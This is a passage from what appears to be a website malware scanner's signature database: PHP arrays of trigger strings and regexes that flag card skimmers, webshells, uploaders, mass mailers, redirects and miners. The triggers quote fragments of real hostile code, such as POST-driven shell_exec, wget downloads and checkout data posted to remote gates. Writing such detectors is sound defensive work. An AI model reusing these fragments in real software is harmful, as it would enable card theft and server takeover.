		'if((location.href.indexOf("checkout/klarna") + 1) && !(document.cookie.indexOf("userpayid")' => array(STR_CLEAR_MULTIMATCH, 'js.malware.payment_redirect.001', 'if\s*\(\(\s*location\.href\.indexOf\(.checkout[^\&]+\&\&\s*\!\(\s*document\.cookie\.indexOf\(.userpayid.\)[^{]+{\s*var\s*\w+\s*=\s*function\(\)\s*{\s*return\s*Math\.random\([^}]+}\s*;\s*document\.cookie\s*=\s*.userpayid=.\s*\+\s*rand\(\)\s*;\s*var\s*\w+\s*=\s*{\s*.location.\s*:\s*.http:\/\/.\s*\+\s*location\.host\s*,\s*.method.\s*:\s*.[Pp]ay[Pp]al.\s*}\s*;\s*document\.location\.href\s*=\s*.https?:.\s*\+\s*atob\([^\)]+\)\s*\+\s*btoa\(\s*JSON\.stringify\(\w+\)\s*\)\s*;'),
		'style="border: 0px none; width: 100%; height: 100vh;z-index:9999999; position:fixed;top:0;left:0",e.src=' => array(STR_CLEAR_MULTIMATCH, 'js.malware.hidden-iframe.008', 'var Cookie=new.Object;\w+=function\(([a-z],){1,5}\w\)\{document.cookie=[^\/]*\/\/\w+\.\w+[^,]*,document.querySelectorAll\(\"html\"\)\[\d\].style."overflow:hidden",[^f]*function.\w+\(\)\{"complete"!==document.readyState\?setTimeout\(\w+,\d+\):add_iframe\(\)\}\w+\(\)\}'),
	),

	'position:absolute;left:-' => array(STR_TRIGGER,
		'<script type="text/javascript">var style = document.createElement("style");style.appendChild(document.createTextNode(".' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-style.003', '<script type=.text.javascript.>var style = document.createElement..style..;style.appendChild.document.createTextNode\(".\w+\s*\{\sposition:absolute;left:-\d{4,5}px;\s*\}"\)\);[^<]+?<.script>(<a class=[^>]+?>[^<]+?<\/a>)+'),
		'<script type=\'text/javascript\'>var style = document.createElement(\'style\');style.appendChild(document.createTextNode(\'.' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-style.003.02', '<script type=.text.javascript.>var style = document.createElement..style..;style.appendChild.document.createTextNode...sid \{ position:absolute;left:-[^<]+<.script>[\s]*(<a class=.sid.[^<]+<.a>[\s]*)+'),
	),

	'jQuery(\'#onestepcheckout-form\').change(function()' => array(STR_TRIGGER,
		'(jQuery(\'input[name="payment[cc_number]"]\').val().replace(/[^0-9]/g,' => array(STR_TRIGGER,
			'/gate.php?token=' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.052', 'jQuery\(document\)\.ready\(function\(\)[\s]*\{[\s]*jQuery\(.#onestepcheckout-form.\)\.change\(function\(\)[\s]*\{[\s]*if[\s]*\(jQuery\(.input\[name..payment[^{]+\{[\s]*jQuery\.post\(.https?:[^,]+gate\.php\?token[^}]+[\}\)\s;]+'),
		),
	),

	'input[name=\'payment[cc_cid]' => array(STR_TRIGGER,
		'{localStorage.setItem("billing",jQuery("#co-billing-form' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.035', '(jQuery)\(document\).ready\(function\(\)\{\1\(.#co-billing-form.\).change\(function\(\)\{(localStorage).setItem\(.(billing).,\1[^\[]+\[name=.payment\[cc_number\].\].\).val\(\)[^>]+>\d+&&\1[^\{]+\{url:[^,]+,data:\1[^\+]+\+.&.\+\2.getItem\(.\3.\),type:.POST.[^\}]+\},[^\}]+\}\}\)\}\)\}\);'),
	),

	'return parseInt(ua.substring(edge + 5, ua.indexOf(".", edge)), 10);' => array(STR_TRIGGER,    
		'if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry' => array(STR_CLEAR_MULTIMATCH,'js.malware.visitor_tracker.001.002', '(\/\*\w{10,}\*\/\s*)?var \w{10,} = setInterval.function...\s*if.document.body != null[^\*]+?function \w{10,}\(\)\{\s*var ua = window.navigator.userAgent.toLowerCase\(\);\s*if...android.bb[^\*\}]+?\}\s*return false;\s*\}(\s*\/\*\w{10,}\*\/)?'),
	),

	'(!getCookie(cname) && CONTENT_URI)' => array(STR_TRIGGER,
		'window.open(CONTENT_URI, \'_blank\');' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.pornspam.002', 'var CONTENT_URI[\s]*=[\s]*.http[^;]+;[\s]*\$\(document\)\.ready\(function\(\)[\s]*\{[\s]*function setCookie[^>]+\$\(document\)\.click\(function\(e\)[\s]*\{[\s]*var cname = .popup_shown.;[\s]*console\.log\(.a.\);[\s]*if[\s]*\(!getCookie\(cname\) && CONTENT_URI[^>]+\}[\s]*\)[\s]*;'),
	),

	'echo(result(array(' => array(STR_TRIGGER,
		'array("%1title%3%sign% $title%2title%3' => array(STR_CLEARFILE, 'php.spam-seo.injector.247', NULL),
	),

	'=document.cookie.replace(/\s/g,"").split(";");for(var' => array(STR_CLEAR_LINEMATCH, 'php.malware.hidden-iframe.002', '\/\*\s*\w+\s*\*\/\s*var\s*\w+=[^>]+?=document.cookie.replace[^>]+?parentNode.removeChild\(document[^>]+?style.cssText=".+?\.appendChild.\w+\);\}catch.\w+\)\{setTimeout\([^>]+?Math.random..\*4294967295[^\*]+;\w+..;\/\*\s*\w+\s*\*\/'),
	'document}catch(dgsgsdg){zxc' => array(STR_CLEAR_LINEMATCH, 'js.malware.hidden-iframe.001','try\{document\[[^\]]+\+[^\]]+\]\*=[\s]*document\}[\s]*catch[^\n]+if\([^\)]+\)[\w]+\[[^\]]+\]\(.\)[\}\s]+'),
	'l = "http://img." + a + "-" + b + ".info/emptya2.gif?i=" + r + "&r=" + document.referrer;' => array(STR_CLEARFILE, 'html.spam-seo.redirect.001', NULL),
	'function GetCookie(_0x' => array(STR_CLEAR_LINEMATCH, 'js.redirect.window_location.001', 'var [\w]+[\s]*=[\s]*\[[^\]]+\][\s]*;[^\n]+function GetCookie[^\n]+return null;[;\}\s]+([^\n]+document\[_0x[^\]]+\]\]=[\w]+;)?'),
	'function createCookie(_0x' => array(STR_CLEAR_LINEMATCH, 'js.redirect.window_location.007', 'var\s+_0x\w{4,}\s*=\s*\[".x\w{2}[^\]]+\];if..readCookie\(_0x[^>]+?\[\d+\]\]\)\};\};return null;\}'),
	'\'var s=document.referrer;if(s.2' => array(STR_CLEAR_LINEMATCH, 'js.redirect.window_location.005', 'eval\(function.p,a,c[^<]+?\(\'var s=document.referrer;if\(s\.2\(\"[^<]+?indexOf..split\(\'\|\'\),0,\{\}\)\)'),
	'|ht|15|mebor|fra|der|scr|no|ing|oll|ig|||if||write|document' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-iframe.005', 'eval.function.p,a,c[^;]+fromCharCode.c.29..c.toString[^\n]+posi.ab.fram.solu..split[^;]+;'),
	'/052F";if(' => array(STR_CLEAR_LINEMATCH, 'js.malware.visitor_tracker_052F.001', '(\/\*\w{28,}\*\/\s*)?function \w{28,}\(\)\{var \w="[^<]+?mobile\|avantgo\|bada[^<]+?\/052F";if\(.+?innerHTML\+\w\}\}\}\w{28,}\(\)\}\},100\);(\s*\/\*\w{28,}\*\/)?'),
	'req.open(\'POST\', drug_name + \'/thread.php' => array(STR_CLEARFILE, 'js.spam-seo.pharma.001', NULL),
	'\u0009\u003c\u0074\u0069\u0074\u006c\u0065\u003e\u004e\u0065\u0074\u0073\u0020\u0056\u0065\u0072\u0069\u0066\u0069\u0065\u0064\u0020\u0062\u0079\u0020' => array(STR_CLEARFILE, 'js.phishing.generic.014', NULL),
	'emailPASS=document.' => array(STR_CLEARFILE, 'html.phishing.yahoo.001.006', NULL),
	'$bad_template = \'<h1 style="color:black">Please read the pdf document.</h1>\';' => array(STR_CLEARFILE, 'php.dropper.generic.002', NULL),
	'flex; align-items: center; justify-content: center; overflow: auto;">\' + \'<a href="http://goo.gl/' => array(STR_CLEARFILE, 'js.spam-seo.pornspam.001', NULL),
	'spwms.com/js/\', \'_blank\')' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.010', '<scrip[^>]+>\s*var\s\w+\s*=\s*false\s*;\s*document\.onclick\s*=\s*function\(event\)\s*{\s*if\s*\(\w+\)\s*{\s*return;\s*}\s*\w+\s*=\s*true\s*;\s*if\s*\(\s*event\s*===\s*undefined\)\s*event\s*=\s*window\.event\s*;\s*var\s*\w+\s*=[^\?]+\?\s*event\.target\s*:\s*event\.srcElement\s*;\s*var\s*\w+\s*=\s*window\.open\(.http(s)?:\/\/spwms\.com[^;]+;\s*win\.focus\(\)\s*;\s*};\s*<.script>'),
	'src = \'https://xs' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.022', ';?\s*var\s*(\w+)\s*=\s*document\.createElement\([\'"]\w+[\'"]\)\s*;\s*\1\.src\s*=\s*[\'"]https?:\/\/(?:\w+\.)?xs+\.\w+\/?[\'"]\s*;\s*document\.head\.appendChild\(\1\)\s*;'),
	'sanidtarysdpasljoldw' => array(STR_CLEAR_LINEMATCH, 'js.malware.fakeanalytics.002', '\(function\(\)\s*{function\s*\w+\(\w+,\w+\)\s*{\s*return\s*\w+\s*==\s*\w+\s*}\s*function\s*\w+\(\)\s*{\s*return\s*document\s*}\s*function\s*\w+\(\)\s*{\s*return\s*String\s*\}\s*function\s*\w+\(\w+,\s*\w+\)\s*{\s*return[^=]+var\s*(\w+)\s*=\s*\(\w+\)\s*\([\'"][^\)]+,\s*\d+\)\s*;\s*function\s*\w+\([^;]+;\s*\w+[^;]+;\s*var\s*(\w+)\s*=\s*\w+\.length\s*;[^}]+}\s*;\s*for\(var[^}]+}\s*;\s*var\s*\w+\s*=\s*\w+\(\)\.fromCharCode\(\d+\)\s*;\s*var\s*\w+\s*=[^}]+}\s*function[^}]+}\s*;[^}]+}\s*\((\w+)\)\s*\(\)\s*;\s*function\s*\w+\([^}]+}\s*function\s*\w+[^}]+}\s*function\s*\w+\(\1,\3[^\?]+\?\1\[\d+\]:\1\[\d+\]\s*\)\s*,\s*\1\[\d+\]\)}}\)\s*\(\)\s*;'),
),

'POST' => array(STR_TRIGGER,

	'$_POST' => array(STR_TRIGGER, 

		'($_POST)' => array(STR_TRIGGER,
	
			'extract' => array(STR_TRIGGER,

				'BY RFX' => array(STR_TRIGGER,
					'@mail("XXXX","MAILIST",$emaillist,"From: X <XXX>");' => array(STR_CLEARFILE, 'php.hacktool.mailer.110', NULL),
				),

				'wp_redirect(get_bloginfo' => array(STR_TRIGGER,
					'if (!empty($password) && $password == $password2) {' => array(STR_CLEARFILE, 'php.hacktool.wp_users.015', NULL),
				),

				'$d(\'\', $f(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.extract.002', 'if\s*\(\s*!empty\s*\(\s*._POST\s*\)\s*\)\s*\{\s*extract\s*\(._POST\)\s*\;[^\(]+\$d\(\'\', \$f\(\s*\$\w[^\}]+\}'),
				'BlackSHOP</title>' => array(STR_CLEARFILE, 'php.hacktool.mailer.052', NULL),
				'echo \'<form method="POST"><textarea name=' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.extract.005', 'if\s*\(\!empty\(\$_POST\)\)\s*{\s*extract\(\$_POST\)\s*;\s*\$(\w+)\(\$(\w+)\)\s*;\s*}\s*else\s*{\s*echo\s*[\'"]<form\s*method=[\'"]POST[\'"]>\s*<textarea\s*name=[\'"]\1[\'"]>\s*<\/textarea>[\'"]\s*;\s*echo\s*[\'"]<textarea\s*name=[\'"]\2[\'"]>\s*<\/textarea>\s*[\'"]\s*;\s*echo\s*[\'"]<input\s*type=[\'"]submit[\'"]>\s*<\/form>[\'"]\s*;\s*}'),
				'Haxplorer' => array(STR_CLEARFILE, 'php.backdoor.haxplorer_shell.001', NULL),
			),
	
			'substr(md5(md5(microtime()) . rand()),' => array(STR_TRIGGER,
				'" . openssl_encrypt(serialize($' => array(STR_TRIGGER,
					'if (!strpos($_SERVER["' => array(STR_TRIGGER,
						'"] = @$_SERVER[' => array(STR_TRIGGER,
							'die(implode(\'\', file($' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.magentoccstealer.002', 'goto[\s]*[\w]+;[\s]*[\w]+:[^!]+if[\s]*\(!(\(isset|empty)[^@]+@[^%]+\\\\x[a-f0-9][^;]+"\];[^%]+goto [\w]+; [\w]+: [\w]+:'), //updated by PG to cover variants
						),
					),
				),
			),
	
			'get_cron_array(' => array(STR_TRIGGER,
				'array_merge($_REQUEST,' => array(STR_TRIGGER,
					'$info[\'feed\']' => array(STR_CLEARFILE, 'php.backdoor.uploader.316', NULL),
				),
			),

			'usort' => array(STR_TRIGGER,
				'\(\s*\'\',\s*\$_POST\[\'' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.generic.066', 'if\s*\(empty\s*\(\$_POST\)\s*\)\s*{\s*echo\s*.Empty\s*data[^;]+;\s*exit;\s*}[^\$]+\$\w+\s*=\s*function\s*\(\$\w+,\s*\$\w+\)\s*{\s*\$_POST\[.\w+.\]\s*\(\s*\$_POST\[.\w+.\]\s*\(\s*..\,\s*\$_POST\[.\w+.\]\s*\(\$_POST\[.\w+.\]\s*\)\s*\)\s*\)\s*;[^\}]+};[^\$]+\$\w+\s*=\s*array\s*\(1\s*=>\s*.1.,\s*2\s*=>\s*.2.\s*\)\s*;\s*\/\/\s*(\w+\s*\w+)?\s*usort\s*\(\s*\$\w+,\s*\$\w+\s*\)\s*;'),
			),
	
			',$strDebug."\n",FILE_APPEND);}' => array(STR_TRIGGER,
				']))&&(isset($_POST))&&(count($_POST)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.114', 'if[\s]*\([\s]*\(preg_match[\s]*\(.~[^\{]+count[\s]*\(\$_POST\)>[\d]+[\s]*\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*base64_encode\([\s]*gzdeflate[\s]*\([\s]*\(isset[\s]*\(\$_COOKIE[\s]*\[.[\w]+.\][\s]*\)[\s]*\?\$_COOKIE\[[^@]+@json_encode[\s]*\(\$_POST\)[\s]*,[\s]*[\d]+[\s]*\)[\s]*\);[\s]*\@file_put_contents\([^;]+FILE_APPEND\);[\s]*\}'),
			),

			'multipart/form-data' => array(STR_TRIGGER,
				'move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], $uploaddir);' => array(STR_CLEARFILE, 'php.backdoor.uploader.384', NULL),
			),

			':sptth' => array(STR_TRIGGER,
				',json_encode($_POST, true));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.019', 'add_action\([^;]+\);[\s]*function [\w]+\([^\)]+\)[\s]*\{[\s]*\$my_[\w]+[\s]*=[\s]*strrev[^;]+\);[\s]*function[^\}]+\}[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\$url\);[^\}]+\}[\s]*\$my_[^\}]+@[\w]+\(\$my[^;]+\);[\s]*\}[\s]*return[^\}]+\}'),
			),

			'>Bypass Chmod' => array(STR_CLEARFILE, 'php.hacktool.chmod.001', NULL),
			'CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.002', NULL),
			'$client = curlSend($clientidPacket, $this->settings[\'panel_username\'], base64_decode($this->settings[\'panel_password' => array(STR_CLEARFILE, 'php.hacktool.ssv3.002', NULL),
			' = stripDangerousValues($_' => array(STR_CLEAR_MULTIMATCH, 'php.malware.drupalgeddon3.001', 'function\s*(strip[Dd]angerous[Vv]alues)\((\$\w+)\)[^#]+#.\)\h*\{[^{]+\{\s*(\2\[\$\w+\]) = \1\(\3\);(\s*\}\s*){2,3}return\h+\$input;\s*\}\s*(?:(?:\$_(?:REQUEST|POST|GET))\s*=\s*\1\((?:\$_(?:REQUEST|POST|GET))\)\s*;\s*){3}'), 
			'<b>success</b>-->' => array(STR_CLEARFILE, 'php.backdoor.uploader.400', NULL),
		),

		'isset' => array(STR_TRIGGER,

			'\}[\s]*\?>' => array(REX_TRIGGER,

				'_POST\[[\'"]\d{10,}[\'"]\]' => array(REX_TRIGGER,
					'<\?php[^>]{0,100}if[\s]*\(isset[^{]+\{[^\x02]{0,1500}\}[\s]*\?>' => array(REX_CLEARFILE, 'php.backdoor.eval_POST.102', NULL),
				),

				'$_POST["pass"];' => array(STR_TRIGGER,
					'strtolower(end(explode(' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.038', NULL),
				),

				'$_POST[\'upl\'])&&' => array(STR_TRIGGER,
					'if(@move_uploaded_file($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.044', NULL),
				),

				'))}}{\${exit()}}' => array(STR_TRIGGER,
					'select * from `wp_users`' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.013', NULL),
				),

				'MAKLO UPLOADER' => array(STR_CLEARFILE, 'php.backdoor.uploader.301', NULL),
				'if($pass_count == count($passwords) - 1){' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.006', NULL),
				'$str=$code ->card->type;break;case "level":$str=$code ->card->category;break;case "bank":$str=isset($code ->issuer ->name)' => array(STR_CLEARFILE, 'php.phishing.mailer.083', NULL),
				'fwrite($save,$msg);fclose($save);$subject=' => array(STR_CLEARFILE, 'php.phishing.mailer.085', NULL),
				'=create_function(\'\',base64_decode($' => array(STR_CLEARFILE, 'php.malware.create_function.014', NULL),
				'PD9waHAKaWYoaXNzZXQoJF9HRVRbInNleHgiXSkmJiRfR0VUWyJzZXh4Il09PSJzZWMiKXsgZWNobydBcGFjaGUgSGVjJzsgfQ' =>array(STR_CLEAR_LINEMATCH, 'php.malware.injector.085', '@\w+\(\);.@set_time_limit\(0\);.@error_reporting\(0\);.@ini_set\([^d]*display_errors\',.0\);\s+\$\w+="cr"."ea...te_...fun...ction.;\$\w+=\$\w+\(".\$\w+...e...v...al[^+]*\+\"\);exit;'),
				'</font>Number of emails' => array(STR_CLEARFILE, 'php.hacktool.mailer.157', NULL),
				'$_SERVER[\'REQUEST_URI\']."&dir=' => array(STR_CLEARFILE, 'php.backdoor.generic.100', NULL),
			),
			
			'/.cpanel/contactinfo\', \'w\')' => array(STR_TRIGGER,
				'/resetpass?start=1\'' => array(STR_CLEARFILE, 'php.hacktool.cpanel_reset_password.001', NULL),
			),

			'curl_init($_COOKIE[\'user_name\']' => array(STR_TRIGGER,
				'$role.=\'/\'.$_COOKIE[\'user_id\'];' => array(STR_CLEARFILE, 'php.backdoor.cookie.008', NULL),
			),

			'error_reporting(E_ALL^E_NOTICE);define(\'O0\', \'O\');' => array(STR_TRIGGER,
				']];}else{echo$GLOBALS{O0}[0x' => array(STR_CLEARFILE, 'php.backdoor.uploader.360', NULL),
			),

			'$_ = " -u : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'] . " "; $_ .= " -p : " . __file__; $' => array(STR_CLEARFILE, 'php.hacktool.mailer.101', NULL),
			'echo "<br>$n - Sending... => $taz => <b> <font color=green> Success</font></b>";' => array(STR_CLEARFILE, 'php.hacktool.mailer.105', NULL),
		),

		'str_replace(' => array(STR_TRIGGER,

			'error_reporting(0)' => array(STR_TRIGGER,

				'(strpos(strtolower($_SERVER[\'HTTP_USER_AGENT\'])' => array(STR_TRIGGER,
					'(isset($_POST[\'h\'], $_POST[\'u\'], $_POST[\'p\'], $_POST[\'n\'])) {' => array(STR_CLEARFILE, 'php.malware.db_injector.007', NULL),
				),
				
				'SET `post_content`=' => array(STR_TRIGGER,
					'$_SERVER[\'HTTP_USER_AGENT\'];if($ua==\'WP_API' => array(STR_CLEAR_LINEMATCH, 'php.malware.db_injector.006', '(\$\w+)\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\]\s*;\s*if\s*\(\1[^\$]+DB_HOST.\)\)\s*{\s*if\(\!isset\((\$\w+)\)\)\s*{\s*\2\s*=\s*[\'"]wp_[\'"]\s*;\s*}\s*(\$\w+)\s*=\s*mysqli_connect\(DB_HOST[^}]+}\s*header\([^{]+{[^\@]+\3,\s*.UPDATE\s*\$\w+\s*SET\s*.post_content.[^}]+}\s*else\s*{\s*die\(json_encode\(array\(.status.\s*=>[^}]+}\s*}[^;]+;\s*}\s*}\s*}\s*else[^;]+;\s*}\s*}'),
					'else{die(json_encode(array(\'status\' => \'incomplete_data' => array(STR_CLEAR_LINEMATCH, 'php.malware.db_injector.006.02', 'error_reporting\(0\);[\s]*@?set_time_limit\(0\);[^>]+status.[\s]*=>[\s]*.db_error[^\*]+\* FROM[^\n]+incomplete_data.[\);\}]+[\s]*(@mysqli_close[^;]+;\}[\s]*|else[\s]*\{die\(json_encode\(array\(.status[^\}]+[\}]+[\s]*)(\/\*[^\n\*]+\*\/)?'),
				),
				
				'<title>404' => array(STR_CLEARFILE, 'php.hacktool.generic.017', NULL),
				'function sqlbackup($ip,$sql,$username,$password)' => array(STR_CLEARFILE, 'php.backdoor.chinese_shell.003', NULL),
				'$param = str_replace("%DOMAIN%", $main_dom[0], $param);' => array(STR_CLEARFILE, 'php.hacktool.wp_users.010', NULL),
			),
			
			'chr(hexdec($' => array(STR_TRIGGER,
				'fwrite($' => array(STR_TRIGGER,
					'tempnam(' => array(STR_TRIGGER,
						'unlink($' => array(STR_CLEARFILE, 'php.backdoor.generic.091', NULL),
					),
				),
			),

			'=str_replace(\'\',\'\',$_POST[' => array(STR_TRIGGER,
				'eval("\"$' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.143', 'NULL'),
			),

			'=$_POST;@$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.029', '(\$\w+)\s*=\s*str_replace\([\'"](\w+)[\'"],\s*[\'"][\'"]\s*,\s*[\'"]\s*(?:[asert]|\2)+[\'"]\s*\)\s*;\s*(\$\w+)\s*=\s*\$_POST\s*;\s*\@?\1\(\3\[\w+\]\)\s*;'),
			'str_replace\([^\)]+,.[\w]+.\);[\s]*@\$[\w]*\(\$_POST\[[\w]+\]\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.str_replace_POST.001', 'print\(md5\([\w]+\)\);\$[\w]*[\s]*=[\s]*str_replace\(.[\w]+.,[^\)]+\);[\s]*@\$[\w]*\(\$_POST\[[\w]+\]\);'),
			'shutdown57' => array(STR_CLEARFILE, 'php.hacktool.generic.021', NULL),
			'<?=$_SERVER[\'SERVER_NAME\']?>(<?=@gethostbyname($_SERVER[\'SERVER_NAME\'])?>)' => array(STR_CLEARFILE, 'php.backdoor.uploader.332', NULL),
			'404 Not Found\');exit;}exec($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.exec.004', '\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*if\(isset\(\$_POST\[.[\w]+.\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_POST\[.[\w]+.\];[\s]*\}[\s]*else[\s]*\{[\s]*header\(.HTTP[^\}]+\);[\s]*exit;[\s]*\}[\s]*exec\(\$[\w]+,[\s]*\$[\w]+\);[\s]*foreach\(\$[\w]+[\s]*as[\s]*\$var\)[\s]*\{echo[\s]*substr_replace\(\$[\w]+,[^\}]+---end---.;[\s]*\}'),
			'encodeIt(this);return' => array(STR_CLEARFILE, 'php.backdoor.passthru.012', NULL),
		),

		'($_POST[' => array(STR_TRIGGER,

			'<form' => array(STR_TRIGGER,

				'if(@copy($_FILES[' => array(STR_TRIGGER,

					'md5($_GET[' => array(STR_TRIGGER,
						'multipart/form-data' => array(STR_CLEARFILE, 'php.backdoor.uploader.393', NULL),
					),

					'if(isset($_POST[\'upload\'])) { if(@copy($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.401', NULL),
					');die();}}}else{if(isset($_POST[' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.062', NULL),
				),

				'exec($' => array(STR_TRIGGER,

					'if(!empty($res)){' => array(STR_TRIGGER,
						'if(isset($_POST[' => array(STR_CLEARFILE, 'php.backdoor.exec.006', NULL),
					),

					'shell_exec($_POST[\'cmd\']." 2>&1"));' => array(STR_CLEARFILE, 'php.backdoor.exec.007', NULL),
					'>Admin Page Finder<' => array(STR_CLEARFILE, 'php.hacktool.admin_page_finder.003', NULL),
				),

				'exec("wget {$' => array(STR_CLEARFILE, 'php.backdoor.uploader.388', NULL),
				'Copyright By Con7ext' => array(STR_CLEARFILE, 'php.backdoor.symlink-sa.007', NULL),
				').(round(0+16+16)*round(0+1+1))._' => array(STR_CLEARFILE, 'php.backdoor.encrypted.007', NULL),
				'(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']))' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.065', NULL),
			),

			'\$.\(\$_POST\[' => array(REX_CHAIN_TRIGGER,
				'\$.[\s]*=[\s]*[^;]+;[\s]*(\/\*[^\n]+\*\/[\s]*)?\$.\(\$_POST\[[^\]]+\]\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.assert.006.02', '\$.[\s]*=[\s]*[^;]+;[\s]*(\/\*[^\n]+\*\/[\s]*)?\$.\(\$_POST\[[^\]]+\]\);'),
				'error_reporting(0);' => array(STR_CLEAR_LINEMATCH, 'php.malware.assert.006.03', 'error_reporting\(0\);[\s]*'),
			),

			'{echo \'200\';' => array(STR_TRIGGER,
				'register_shutdown_function($c(\'\', $f($_POST[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.135', NULL),
			),

			'top.location' => array(STR_TRIGGER,
				'$url = $url . "&text=" . urlencode($messaggio);' => array(STR_CLEARFILE, 'php.hacktool.mailer.148', NULL),
			),

			'public function __construct($' => array(STR_TRIGGER,
				'@$constante($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.090', 'class[\s]*[\w]+[\s]*\{[\s]*public[\s]*function[\s]*__construct\(\$[\w]+,[\s]*\$[\w]+[\s]*,\$[\w]+\)[\s]*\{[\s]*if\(!empty\(\$_POST\[.[\d]+.\]\)\)[\s]*\{[\s]*@\$[\w]+\(\$[\w]+,[\s]*\$[\w]+\);[\s]*die\(.{10,100}\);[\s]*\}[\s]*\}[\s]*\}[\s]*if\(!empty\(\$_POST\[.[\d]+.\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*new[\s]*[\w]+\(\$_POST\[.[\w]+.\],\$_POST\[.[\d]+.\],[\s]*\$_POST\[.[\d]+.\]\);[\s]*\}'),
			),

			'chr(0x' => array(STR_TRIGGER,
				'$hook($_POST[\'cmd\']);' => array(STR_CLEARFILE, 'php.backdoor.system.023', NULL),
			),
		),

		'if($_GET[' => array(STR_TRIGGER,

			'foreach ($myplugins as $key' => array(STR_TRIGGER,
				'(\'<?php  /*\'.md5(time()).\'*/ ?>' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.008', NULL),
				'/*  hello \' . uniqid().\' |||| \'.' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.016', NULL),
			),

			'["rnd"]);}elseif($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.075', 'if\s*\(\s*\$_GET\[.rnd.\]\s*\)\s*{\s*die\s*\(\s*\$_GET\s*\[.rnd.\]\s*\)\s*;\s*\}\s*elseif\s*\(\s*\$_POST\s*\[.\w+.\]\s*\)\s*{[^\}]*exit\s*;\s*}'),
			'];echo(\'<textarea style="width:100%;height:100%;" wrap="off">\'.$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.018', 'error_reporting\(0\)\s*;\s*(\$\w+)\s*=\s*[\'"strrev\.\/\*\+]+;\s*(\$\w+)\s*=\s*\1[^<]+(\$\w+)=[\'"]\s*<form\s*method=[\'"][PpOoSsTt]{4}[\'"]>\s*[^{]+{\s*echo\s*\(\3\)\s*;\s*if\(\$_SERVER\[.REQUEST_METHOD.\]=+[\'"][PpOoSsTt]{4}[\'"]\s*\)\s*{[^{]+{\s*echo\s*\([^{]+{\s*\$\w+\s*=\s*empty\(\$_POST\[[^>]+>\s*[\'"]\s*;\s*}\s*else\s*{\s*\$\w+[^>]+>\s*[\'"]\s*;\s*}\s*}[^}]+}\s*exit\s*;\s*}[^}]+}\s*exit\s*;}'),
		), 

		'_COOKIE' => array(STR_TRIGGER,
			'\$_POST\[.[\w]*.\][\s]*=[\s]*.[\w]+.;[\s]*\$[\w]+[\s]*=[\s]*Array\(\);[^_]+\]\(\$_COOKIE' => array(REX_CLEARFILE, 'php.malware.create_function.019', NULL),
			'uto exploiter' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.004', NULL),
		),

		'mysql_select_db(' => array(STR_TRIGGER,
			' = stripcslashes($_POST[\'' => array(STR_CLEARFILE, 'php.backdoor.mysql_shell.003', NULL),
			'load data local infile' => array(STR_CLEARFILE, 'php.backdoor.mysql_shell.004', NULL),
		),

		'});/*' => array(STR_TRIGGER, 
			'\((@?\$\s*(\{[\'"])?_(POST|COOKIE)[\w\}\{\'"\s,\$\_\/\*\)\@]{10})' => array(REX_CLEAR_MULTIMATCH, 'rex.array_filter.001', '(<\?php\s*)?@(array_filter\(array|register_shutdown_function)\((@?\$\s*(\{[\'"])?_(POST|COOKIE)[\w\}\{\'"\s,\$\_\/\*\)\@]+)\}\)\s*;(\/\*[^\*]+\*\/)?'),
		),

		' $_POST ' => array(STR_TRIGGER, 
